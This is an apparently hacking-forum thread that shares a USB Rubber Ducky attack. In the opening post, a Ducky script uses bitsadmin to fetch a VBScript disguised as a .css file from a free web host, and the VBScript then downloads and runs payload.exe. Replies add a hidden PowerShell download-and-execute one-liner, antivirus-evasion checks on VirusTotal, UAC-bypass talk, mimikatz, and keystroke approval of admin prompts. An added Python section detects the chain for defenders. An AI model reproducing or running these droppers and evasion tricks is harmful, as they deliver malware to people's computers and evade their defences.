
Fast payload download and install script


Hashirama


So, this script downloads a VB script via cmd, which in turn downloads payload.exe.

To use this script you'll need some prep to do. First, sign up for a free website hosting (like eu.pn). You don't need to create any website, just to use that host for easy payload downloads. Rename VB script from .vbs to .css, also do the same for the payload from .exe to .css. WHY? Because you can't upload other file formats but html, css, js, and image formats and you need a full path link for this to work! And NO, you don't have to have admin rights for this to work!

VB script:

SaveWebBinary "http://yourfreesubdomain.eu.pn/payload.css", "C:\Users\Public\payload.exe"
Function SaveWebBinary(strUrl, strFile) 'As Boolean
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Const ForWriting = 2
Dim web, varByteArray, strData, strBuffer, lngCounter, ado
    On Error Resume Next
    'Download the file with any available object
    Err.Clear
    Set web = Nothing
    Set web = CreateObject("WinHttp.WinHttpRequest.5.1")
    If web Is Nothing Then Set web = CreateObject("WinHttp.WinHttpRequest")
    If web Is Nothing Then Set web = CreateObject("MSXML2.ServerXMLHTTP")
    If web Is Nothing Then Set web = CreateObject("Microsoft.XMLHTTP")
    web.Open "GET", strURL, False
    web.Send
    If Err.Number <> 0 Then
        SaveWebBinary = False
        Set web = Nothing
        Exit Function
    End If
    If web.Status <> "200" Then
        SaveWebBinary = False
        Set web = Nothing
        Exit Function
    End If
    varByteArray = web.ResponseBody
    Set web = Nothing
    'Now save the file with any available method
    On Error Resume Next
    Set ado = Nothing
    Set ado = CreateObject("ADODB.Stream")
    If ado Is Nothing Then
        Set fs = CreateObject("Scripting.FileSystemObject")
        Set ts = fs.OpenTextFile(strFile, ForWriting, True)
        strData = ""
        strBuffer = ""
        For lngCounter = 0 to UBound(varByteArray)
            ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
        Next
        ts.Close
    Else
        ado.Type = adTypeBinary
        ado.Open
        ado.Write varByteArray
        ado.SaveToFile strFile, adSaveCreateOverWrite
        ado.Close
    End If
    SaveWebBinary = True
End Function
wscript.sleep 5000
CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe"

Ducky script:

GUI r
DELAY 200
STRING cmd /C bitsadmin /transfer /download /priority foreground http://yourfreesubdomain.eu.pn/vb_script.css C:\Users\Public\dl.vbs && start C:\Users\Public\dl.vbs
ENTER

Happy hacking!


  • 2 months later...
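
For defenders, the chain in the post above (bitsadmin fetches a script served under a .css name, wscript runs it from C:\Users\Public, and the script launches an executable from the same folder) leaves a recognisable process-creation trail. The following is an added example, not part of the original thread: a Python detector that flags each stage in constructed Sysmon-style events; the event field names, rule names and the host files.example.test are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (fields modelled on Sysmon Event ID 1).
EVENTS = [
    {"pid": 211, "ppid": 210, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer /download /priority foreground "
            r"http://files.example.test/vb_script.css C:\Users\Public\dl.vbs"},
    {"pid": 212, "ppid": 210, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\Public\dl.vbs"'},
    {"pid": 213, "ppid": 212, "image": r"C:\Users\Public\payload.exe",
     "cmd": r"C:\Users\Public\payload.exe"},
    # Benign look-alikes that must not fire.
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Program Files\Vendor\inventory.vbs"'},
    {"pid": 301, "ppid": 100, "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": "bitsadmin /list"},
]

USER_WRITABLE = re.compile(r"^c:\\users\\(public|[^\\]+\\appdata)\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
URL = re.compile(r"https?://[^\s\"]+", re.I)
WIN_PATH = re.compile(r"[a-z]:\\[^\s\"]+", re.I)

def exe_name(path):
    return PureWindowsPath(path).name.lower()

def ext(s):
    m = re.search(r"\.(\w+)$", s.split("?")[0])
    return m.group(1).lower() if m else ""

def detect(events):
    """Return (pid, rule) pairs for each stage of the download-and-run chain."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        exe, cmd = exe_name(e["image"]), e["cmd"]
        paths = WIN_PATH.findall(cmd)
        url = URL.search(cmd)
        parent_image = by_pid.get(e["ppid"], {}).get("image", "")
        if exe == "bitsadmin.exe" and "/transfer" in cmd.lower() and url:
            hits.append((e["pid"], "bits-download"))
            # Saved under a different extension than it was served with (.css -> .vbs).
            if paths and ext(paths[-1]) != ext(url.group()):
                hits.append((e["pid"], "extension-mismatch"))
        if exe in SCRIPT_HOSTS and any(USER_WRITABLE.match(p) for p in paths):
            hits.append((e["pid"], "script-from-user-writable-dir"))
        if USER_WRITABLE.match(e["image"]) and exe_name(parent_image) in SCRIPT_HOSTS:
            hits.append((e["pid"], "binary-spawned-by-script-host"))
    return hits
```

Calling `detect(EVENTS)` flags pids 211, 212 and 213 and leaves the two benign events alone; parents missing from the sample are treated as unknown.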

Why download and use the VB script to download the end file when you can just download and execute the file directly?

Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.


Because it's all about the speed. In this case you only need 3 seconds and you are done. VB file is small, which means less download time, and less download time means CMD window will be gone in a flash.

You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.

(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'

You could instead use powershell, which would have maybe 0.2s of visibility on the screen if run with the hidden windowstyle.

(New-Object Net.WebClient).DownloadFile('http://yourhost.com/helpfulexecutable.exe','C:\helper.exe');&'C:\helper.exe'

I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.


I use Panda Free Antivirus. Is there any other VB script which does the same but doesn't get detected?

It's also useful because you can change the download file on your webspace and you don't need to change the rubby USB inject.bin :D

I scanned vb script on virus total, and didn't get any detections.


https://www.virustotal.com/de/file/93f47a42353bbf6a88332c0a18b721254e991a0476a6d155fbac60a80fe85bc2/analysis/1455991661/

Lol, my AV detects it, Panda :)

I thought it's a bad AV scanner

but on most AVs it's clean, so it's usable xD

Damn, AVs are updated too fast. LoL Anyway, simple google search will get you a lot of vb scripts for downloading a file.


I was thinking on powershell, but I couldn't find the info which windows os has it installed by default, so I'm using vb just to be sure it'll work.

I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions.


I believe everything since Vista SP1 has it enabled by default. On the other hand, I believe bitsadmin is supported by even fewer versions.

Are you sure? Because bitsadmin is on Win10. Anyway, does anyone know any VB script with privs escalation or UAC bypass? Tried Google, tried deep web, but found nothing helpful.


Are you sure? Because bitsadmin is on Win10. Anyway, does anyone know any VB script with privs escalation or UAC bypass? Tried Google, tried deep web, but found nothing helpful.

I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was deprecated when Windows 7 came out in favor of using PowerShell. As for a UAC bypass using VBS... dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt.

That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.


I know bitsadmin came with XP SP1 support tools, but I was fairly certain that it only came if you had Pro and not Home (a lot of things weren't available for the Home edition) unless you specifically downloaded it yourself. Past XP it was included by default. Either way, bitsadmin was deprecated when Windows 7 came out in favor of using PowerShell. As for a UAC bypass using VBS... dude, do you really think it'd be as simple as a bit of code you could just copy and paste from some website? Give MS some credit. If anything like that was released in the wild, it'd be patched in no time. You can't even simulate keystrokes to try to navigate the UAC prompt.

That being said, when you plug in a keyboard you can easily use key presses to approve admin access, and once you have that you can easily maintain it.

I tried simulating keystrokes and it didn't work. But mimikatz is still working; I'm trying to implement it somehow.


I tried simulating keystrokes and it didn't work. But mimikatz is still working; I'm trying to implement it somehow.

The point I was trying to make at the end there is that you should get admin immediately, then you can maintain it easily. Having physical access means that all security measures are basically pointless, all that matters is automating it. In this case, using the ducky to send ALT y while at a UAC prompt will accept it and continue.
